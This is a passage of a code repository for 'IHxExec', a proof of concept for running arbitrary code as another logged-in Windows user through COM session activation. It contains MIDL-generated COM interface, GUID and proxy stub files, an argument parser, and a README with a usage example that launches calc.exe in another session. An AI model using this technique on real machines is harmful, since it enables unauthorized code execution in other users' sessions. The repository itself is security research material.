*SetOrigClsctx )( 383 | ISpecialSystemProperties * This, 384 | /* [in] */ DWORD dwClsctx); 385 | 386 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetOrigClsctx) 387 | HRESULT ( STDMETHODCALLTYPE *GetOrigClsctx )( 388 | ISpecialSystemProperties * This, 389 | /* [out] */ DWORD *dwClsctx); 390 | 391 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, GetDefaultAuthenticationLevel) 392 | HRESULT ( STDMETHODCALLTYPE *GetDefaultAuthenticationLevel )( 393 | ISpecialSystemProperties * This, 394 | /* [out] */ DWORD *pdwAuthnLevel); 395 | 396 | DECLSPEC_XFGVIRT(ISpecialSystemProperties, SetDefaultAuthenticationLevel) 397 | HRESULT ( STDMETHODCALLTYPE *SetDefaultAuthenticationLevel )( 398 | ISpecialSystemProperties * This, 399 | /* [in] */ DWORD dwAuthnLevel); 400 | 401 | END_INTERFACE 402 | } ISpecialSystemPropertiesVtbl; 403 | 404 | interface ISpecialSystemProperties 405 | { 406 | CONST_VTBL struct ISpecialSystemPropertiesVtbl *lpVtbl; 407 | }; 408 | 409 | 410 | 411 | #ifdef COBJMACROS 412 | 413 | 414 | #define ISpecialSystemProperties_QueryInterface(This,riid,ppvObject) \ 415 | ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 416 | 417 | #define ISpecialSystemProperties_AddRef(This) \ 418 | ( (This)->lpVtbl -> AddRef(This) ) 419 | 420 | #define ISpecialSystemProperties_Release(This) \ 421 | ( (This)->lpVtbl -> Release(This) ) 422 | 423 | 424 | #define ISpecialSystemProperties_SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) \ 425 | ( (This)->lpVtbl -> SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) ) 426 | 427 | #define ISpecialSystemProperties_GetSessionId(This,pdwSessionId,pbUseConsole) \ 428 | ( (This)->lpVtbl -> GetSessionId(This,pdwSessionId,pbUseConsole) ) 429 | 430 | #define ISpecialSystemProperties_GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) \ 431 | ( (This)->lpVtbl -> GetSessionId2(This,pdwSessionId,pbUseConsole,pfRemoteThisSessionId) ) 432 | 433 | #define ISpecialSystemProperties_SetClientImpersonating(This,fClientImpersonating) \ 434 | ( (This)->lpVtbl -> SetClientImpersonating(This,fClientImpersonating) ) 435 | 436 | #define ISpecialSystemProperties_GetClientImpersonating(This,pfClientImpersonating) \ 437 | ( (This)->lpVtbl -> GetClientImpersonating(This,pfClientImpersonating) ) 438 | 439 | #define ISpecialSystemProperties_SetPartitionId(This,guidPartiton) \ 440 | ( (This)->lpVtbl -> SetPartitionId(This,guidPartiton) ) 441 | 442 | #define ISpecialSystemProperties_GetPartitionId(This,pguidPartiton) \ 443 | ( (This)->lpVtbl -> GetPartitionId(This,pguidPartiton) ) 444 | 445 | #define ISpecialSystemProperties_SetProcessRequestType(This,dwPRT) \ 446 | ( (This)->lpVtbl -> SetProcessRequestType(This,dwPRT) ) 447 | 448 | #define ISpecialSystemProperties_GetProcessRequestType(This,pdwPRT) \ 449 | ( (This)->lpVtbl -> GetProcessRequestType(This,pdwPRT) ) 450 | 451 | #define ISpecialSystemProperties_SetOrigClsctx(This,dwClsctx) \ 452 | ( (This)->lpVtbl -> SetOrigClsctx(This,dwClsctx) ) 453 | 454 | #define ISpecialSystemProperties_GetOrigClsctx(This,dwClsctx) \ 455 | ( (This)->lpVtbl -> GetOrigClsctx(This,dwClsctx) ) 456 | 457 | #define ISpecialSystemProperties_GetDefaultAuthenticationLevel(This,pdwAuthnLevel) \ 458 | ( (This)->lpVtbl -> GetDefaultAuthenticationLevel(This,pdwAuthnLevel) ) 459 | 460 | #define ISpecialSystemProperties_SetDefaultAuthenticationLevel(This,dwAuthnLevel) \ 461 | ( (This)->lpVtbl -> SetDefaultAuthenticationLevel(This,dwAuthnLevel) ) 462 | 463 | #endif /* COBJMACROS */ 464 | 465 | 466 | #endif /* C style interface */ 467 | 468 | 469 | 470 | 471 | #endif /* __ISpecialSystemProperties_INTERFACE_DEFINED__ */ 472 | 473 | 474 | /* Additional Prototypes for ALL interfaces */ 475 | 476 | /* end of Additional Prototypes */ 477 | 478 | #ifdef __cplusplus 479 | } 480 | #endif 481 | 482 | #endif 483 | 484 | 485 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IStandardActivator_i.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */ 4 | 5 | /* link this file in with the server and any clients */ 6 | 7 | 8 | /* File created by MIDL compiler version 8.01.0626 */ 9 | /* at Tue Jan 19 08:14:07 2038 10 | */ 11 | /* Compiler settings for IStandardActivator.idl: 12 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 13 | protocol : all , ms_ext, c_ext, robust 14 | error checks: allocation ref bounds_check enum stub_data 15 | VC __declspec() decoration level: 16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 17 | DECLSPEC_UUID(), MIDL_INTERFACE() 18 | */ 19 | /* @@MIDL_FILE_HEADING( ) */ 20 | 21 | 22 | 23 | #ifdef __cplusplus 24 | extern "C"{ 25 | #endif 26 | 27 | 28 | #include 29 | #include 30 | 31 | #ifdef _MIDL_USE_GUIDDEF_ 32 | 33 | #ifndef INITGUID 34 | #define INITGUID 35 | #include 36 | #undef INITGUID 37 | #else 38 | #include 39 | #endif 40 | 41 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 42 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) 43 | 44 | #else // !_MIDL_USE_GUIDDEF_ 45 | 46 | #ifndef __IID_DEFINED__ 47 | #define __IID_DEFINED__ 48 | 49 | typedef struct _IID 50 | { 51 | unsigned long x; 52 | unsigned short s1; 53 | unsigned short s2; 54 | unsigned char c[8]; 55 | } IID; 56 | 57 | #endif // __IID_DEFINED__ 58 | 59 | #ifndef CLSID_DEFINED 60 | #define CLSID_DEFINED 61 | typedef IID CLSID; 62 | #endif // CLSID_DEFINED 63 | 64 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 65 | EXTERN_C __declspec(selectany) const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}} 66 | 67 | #endif // !_MIDL_USE_GUIDDEF_ 68 | 69 | MIDL_DEFINE_GUID(IID, IID_IStandardActivator,0x000001b8,0x0000,0x0000,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46); 70 | 71 | 72 | MIDL_DEFINE_GUID(IID, IID_ISpecialSystemProperties,0x000001b9,0x0000,0x0000,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46); 73 | 74 | #undef MIDL_DEFINE_GUID 75 | 76 | #ifdef __cplusplus 77 | } 78 | #endif 79 | 80 | 81 | 82 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/IStandardActivator_p.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the proxy stub code */ 4 | 5 | 6 | /* File created by MIDL compiler version 8.01.0626 */ 7 | /* at Tue Jan 19 08:14:07 2038 8 | */ 9 | /* Compiler settings for IStandardActivator.idl: 10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 11 | protocol : all , ms_ext, c_ext, robust 12 | error checks: allocation ref bounds_check enum stub_data 13 | VC __declspec() decoration level: 14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 15 | DECLSPEC_UUID(), MIDL_INTERFACE() 16 | */ 17 | /* @@MIDL_FILE_HEADING( ) */ 18 | 19 | #if defined(_M_AMD64) 20 | 21 | 22 | #if _MSC_VER >= 1200 23 | #pragma warning(push) 24 | #endif 25 | 26 | #pragma warning( disable: 4211 ) /* redefine extern to static */ 27 | #pragma warning( disable: 4232 ) /* dllimport identity*/ 28 | #pragma warning( disable: 4024 ) /* array to pointer mapping*/ 29 | #pragma warning( disable: 4152 ) /* function/data pointer conversion in expression */ 30 | 31 | #define USE_STUBLESS_PROXY 32 | 33 | 34 | /* verify that the version is high enough to compile this file*/ 35 | #ifndef __REDQ_RPCPROXY_H_VERSION__ 36 | #define __REQUIRED_RPCPROXY_H_VERSION__ 475 37 | #endif 38 | 39 | 40 | #include "rpcproxy.h" 41 | #include "ndr64types.h" 42 | #ifndef __RPCPROXY_H_VERSION__ 43 | #error this stub requires an updated version of 44 | #endif /* __RPCPROXY_H_VERSION__ */ 45 | 46 | 47 | #include "IStandardActivator_h.h" 48 | 49 | #define TYPE_FORMAT_STRING_SIZE 3 50 | #define PROC_FORMAT_STRING_SIZE 1 51 | #define EXPR_FORMAT_STRING_SIZE 1 52 | #define TRANSMIT_AS_TABLE_SIZE 0 53 | #define WIRE_MARSHAL_TABLE_SIZE 0 54 | 55 | typedef struct _IStandardActivator_MIDL_TYPE_FORMAT_STRING 56 | { 57 | short Pad; 58 | unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; 59 | } IStandardActivator_MIDL_TYPE_FORMAT_STRING; 60 | 61 | typedef struct _IStandardActivator_MIDL_PROC_FORMAT_STRING 62 | { 63 | short Pad; 64 | unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; 65 | } IStandardActivator_MIDL_PROC_FORMAT_STRING; 66 | 67 | typedef struct _IStandardActivator_MIDL_EXPR_FORMAT_STRING 68 | { 69 | long Pad; 70 | unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; 71 | } IStandardActivator_MIDL_EXPR_FORMAT_STRING; 72 | 73 | 74 | static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = 75 | {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; 76 | 77 | static const RPC_SYNTAX_IDENTIFIER _NDR64_RpcTransferSyntax = 78 | {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}}; 79 | 80 | #if defined(_CONTROL_FLOW_GUARD_XFG) 81 | #define XFG_TRAMPOLINES(ObjectType)\ 82 | static unsigned long ObjectType ## _UserSize_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ 83 | {\ 84 | return ObjectType ## _UserSize(pFlags, Offset, pObject);\ 85 | }\ 86 | static unsigned char * ObjectType ## _UserMarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ 87 | {\ 88 | return ObjectType ## _UserMarshal(pFlags, pBuffer, pObject);\ 89 | }\ 90 | static unsigned char * ObjectType ## _UserUnmarshal_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ 91 | {\ 92 | return ObjectType ## _UserUnmarshal(pFlags, pBuffer, pObject);\ 93 | }\ 94 | static void ObjectType ## _UserFree_XFG(unsigned long * pFlags, void * pObject)\ 95 | {\ 96 | ObjectType ## _UserFree(pFlags, pObject);\ 97 | } 98 | #define XFG_TRAMPOLINES64(ObjectType)\ 99 | static unsigned long ObjectType ## _UserSize64_XFG(unsigned long * pFlags, unsigned long Offset, void * pObject)\ 100 | {\ 101 | return ObjectType ## _UserSize64(pFlags, Offset, pObject);\ 102 | }\ 103 | static unsigned char * ObjectType ## _UserMarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ 104 | {\ 105 | return ObjectType ## _UserMarshal64(pFlags, pBuffer, pObject);\ 106 | }\ 107 | static unsigned char * ObjectType ## _UserUnmarshal64_XFG(unsigned long * pFlags, unsigned char * pBuffer, void * pObject)\ 108 | {\ 109 | return ObjectType ## _UserUnmarshal64(pFlags, pBuffer, pObject);\ 110 | }\ 111 | static void ObjectType ## _UserFree64_XFG(unsigned long * pFlags, void * pObject)\ 112 | {\ 113 | ObjectType ## _UserFree64(pFlags, pObject);\ 114 | } 115 | #define XFG_BIND_TRAMPOLINES(HandleType, ObjectType)\ 116 | static void* ObjectType ## _bind_XFG(HandleType pObject)\ 117 | {\ 118 | return ObjectType ## _bind((ObjectType) pObject);\ 119 | }\ 120 | static void ObjectType ## _unbind_XFG(HandleType pObject, handle_t ServerHandle)\ 121 | {\ 122 | ObjectType ## _unbind((ObjectType) pObject, ServerHandle);\ 123 | } 124 | #define XFG_TRAMPOLINE_FPTR(Function) Function ## _XFG 125 | #else 126 | #define XFG_TRAMPOLINES(ObjectType) 127 | #define XFG_TRAMPOLINES64(ObjectType) 128 | #define XFG_BIND_TRAMPOLINES(HandleType, ObjectType) 129 | #define XFG_TRAMPOLINE_FPTR(Function) Function 130 | #endif 131 | 132 | 133 | 134 | extern const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL_TypeFormatString; 135 | extern const IStandardActivator_MIDL_PROC_FORMAT_STRING IStandardActivator__MIDL_ProcFormatString; 136 | extern const IStandardActivator_MIDL_EXPR_FORMAT_STRING IStandardActivator__MIDL_ExprFormatString; 137 | 138 | 139 | 140 | #if !defined(__RPC_WIN64__) 141 | #error Invalid build platform for this stub. 142 | #endif 143 | 144 | static const IStandardActivator_MIDL_PROC_FORMAT_STRING IStandardActivator__MIDL_ProcFormatString = 145 | { 146 | 0, 147 | { 148 | 149 | 0x0 150 | } 151 | }; 152 | 153 | static const IStandardActivator_MIDL_TYPE_FORMAT_STRING IStandardActivator__MIDL_TypeFormatString = 154 | { 155 | 0, 156 | { 157 | NdrFcShort( 0x0 ), /* 0 */ 158 | 159 | 0x0 160 | } 161 | }; 162 | 163 | 164 | /* Object interface: IUnknown, ver. 0.0, 165 | GUID={0x00000000,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 166 | 167 | 168 | /* Object interface: IStandardActivator, ver. 0.0, 169 | GUID={0x000001b8,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 170 | 171 | 172 | /* Object interface: ISpecialSystemProperties, ver. 0.0, 173 | GUID={0x000001b9,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 174 | 175 | 176 | #endif /* defined(_M_AMD64)*/ 177 | 178 | 179 | 180 | /* this ALWAYS GENERATED file contains the proxy stub code */ 181 | 182 | 183 | /* File created by MIDL compiler version 8.01.0626 */ 184 | /* at Tue Jan 19 08:14:07 2038 185 | */ 186 | /* Compiler settings for IStandardActivator.idl: 187 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 188 | protocol : all , ms_ext, c_ext, robust 189 | error checks: allocation ref bounds_check enum stub_data 190 | VC __declspec() decoration level: 191 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 192 | DECLSPEC_UUID(), MIDL_INTERFACE() 193 | */ 194 | /* @@MIDL_FILE_HEADING( ) */ 195 | 196 | #if defined(_M_AMD64) 197 | 198 | 199 | 200 | 201 | #if !defined(__RPC_WIN64__) 202 | #error Invalid build platform for this stub. 203 | #endif 204 | 205 | 206 | #include "ndr64types.h" 207 | #include "pshpack8.h" 208 | 209 | 210 | typedef 211 | NDR64_FORMAT_UINT32 212 | __midl_frag1_t; 213 | extern const __midl_frag1_t __midl_frag1; 214 | 215 | static const __midl_frag1_t __midl_frag1 = 216 | (NDR64_UINT32) 0 /* 0x0 */; 217 | 218 | 219 | #include "poppack.h" 220 | 221 | 222 | 223 | /* Object interface: IUnknown, ver. 0.0, 224 | GUID={0x00000000,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 225 | 226 | 227 | /* Object interface: IStandardActivator, ver. 0.0, 228 | GUID={0x000001b8,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 229 | 230 | 231 | /* Object interface: ISpecialSystemProperties, ver. 0.0, 232 | GUID={0x000001b9,0x0000,0x0000,{0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46}} */ 233 | 234 | static const MIDL_STUB_DESC Object_StubDesc = 235 | { 236 | 0, 237 | NdrOleAllocate, 238 | NdrOleFree, 239 | 0, 240 | 0, 241 | 0, 242 | 0, 243 | 0, 244 | IStandardActivator__MIDL_TypeFormatString.Format, 245 | 1, /* -error bounds_check flag */ 246 | 0x60001, /* Ndr library version */ 247 | 0, 248 | 0x8010272, /* MIDL Version 8.1.626 */ 249 | 0, 250 | 0, 251 | 0, /* notify & notify_flag routine table */ 252 | 0x2000001, /* MIDL flag */ 253 | 0, /* cs routines */ 254 | 0, /* proxy/server info */ 255 | 0 256 | }; 257 | 258 | const CInterfaceProxyVtbl * const _IStandardActivator_ProxyVtblList[] = 259 | { 260 | 0 261 | }; 262 | 263 | const CInterfaceStubVtbl * const _IStandardActivator_StubVtblList[] = 264 | { 265 | 0 266 | }; 267 | 268 | PCInterfaceName const _IStandardActivator_InterfaceNamesList[] = 269 | { 270 | 0 271 | }; 272 | 273 | 274 | #define _IStandardActivator_CHECK_IID(n) IID_GENERIC_CHECK_IID( _IStandardActivator, pIID, n) 275 | 276 | int __stdcall _IStandardActivator_IID_Lookup( const IID * pIID, int * pIndex ) 277 | { 278 | UNREFERENCED_PARAMETER(pIID); 279 | UNREFERENCED_PARAMETER(pIndex); 280 | return 0; 281 | } 282 | 283 | const ExtendedProxyFileInfo IStandardActivator_ProxyFileInfo = 284 | { 285 | (PCInterfaceProxyVtblList *) & _IStandardActivator_ProxyVtblList, 286 | (PCInterfaceStubVtblList *) & _IStandardActivator_StubVtblList, 287 | (const PCInterfaceName * ) & _IStandardActivator_InterfaceNamesList, 288 | 0, /* no delegation */ 289 | & _IStandardActivator_IID_Lookup, 290 | 0, 291 | 2, 292 | 0, /* table of [async_uuid] interfaces */ 293 | 0, /* Filler1 */ 294 | 0, /* Filler2 */ 295 | 0 /* Filler3 */ 296 | }; 297 | #if _MSC_VER >= 1200 298 | #pragma warning(pop) 299 | #endif 300 | 301 | 302 | #endif /* defined(_M_AMD64)*/ 303 | 304 | -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/argparse.cpp: -------------------------------------------------------------------------------- 1 | #include "argparse.h" 2 | 3 | wchar_t* getCmdOption(wchar_t** begin, wchar_t** end, const std::wstring& option) 4 | { 5 | wchar_t** itr = std::find(begin, end, option); 6 | if (itr != end && ++itr != end) 7 | { 8 | return *itr; 9 | } 10 | return nullptr; 11 | } 12 | 13 | bool cmdOptionExists(wchar_t** begin, wchar_t** end, const std::wstring& option) 14 | { 15 | return std::find(begin, end, option) != end; 16 | } -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/argparse.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | wchar_t* getCmdOption(wchar_t** begin, wchar_t** end, const std::wstring& option); 6 | bool cmdOptionExists(wchar_t** begin, wchar_t** end, const std::wstring& option); -------------------------------------------------------------------------------- /Code/IHxExec/IHxExec/dlldata.c: -------------------------------------------------------------------------------- 1 | /********************************************************* 2 | DllData file -- generated by MIDL compiler 3 | 4 | DO NOT ALTER THIS FILE 5 | 6 | This file is regenerated by MIDL on every IDL file compile. 7 | 8 | To completely reconstruct this file, delete it and rerun MIDL 9 | on all the IDL files in this DLL, specifying this file for the 10 | /dlldata command line option 11 | 12 | *********************************************************/ 13 | 14 | 15 | #include 16 | 17 | #ifdef __cplusplus 18 | extern "C" { 19 | #endif 20 | 21 | EXTERN_PROXY_FILE( IStandardActivator ) 22 | 23 | 24 | PROXYFILE_LIST_START 25 | /* Start of list */ 26 | REFERENCE_PROXY_FILE( IStandardActivator ), 27 | /* End of list */ 28 | PROXYFILE_LIST_END 29 | 30 | 31 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) 32 | 33 | #ifdef __cplusplus 34 | } /*extern "C" */ 35 | #endif 36 | 37 | /* end of generated dlldata file */ 38 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # IHxExec 3 | 4 | POC to execute arbitrary code on behalf of another user. U can read more about the technique here: 5 | - https://cicada-8.medium.com/process-injection-is-dead-long-live-ihxhelppaneserver-af8f20431b5d 6 | - https://www.youtube.com/watch?v=bK3ufqZxkxc 7 | 8 | 9 | Note the attached video: 10 | - https://github.com/CICADA8-Research/IHxExec/blob/main/demo.mkv 11 | 12 | # Usage 13 | ```shell 14 | .\IHxExec.exe -s -c 15 | 16 | # Ex 17 | .\IHxExec.exe -s 1 -c c:/windows/system32/calc.exe 18 | ``` 19 | ![explorer_DrFNrRODWT](https://github.com/user-attachments/assets/eb4c1786-585a-4c09-ad55-b979d1639db5) 20 | -------------------------------------------------------------------------------- /demo.mkv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CICADA8-Research/IHxExec/5406fae9790e555e7aae1b28296f2b197ab3bffa/demo.mkv --------------------------------------------------------------------------------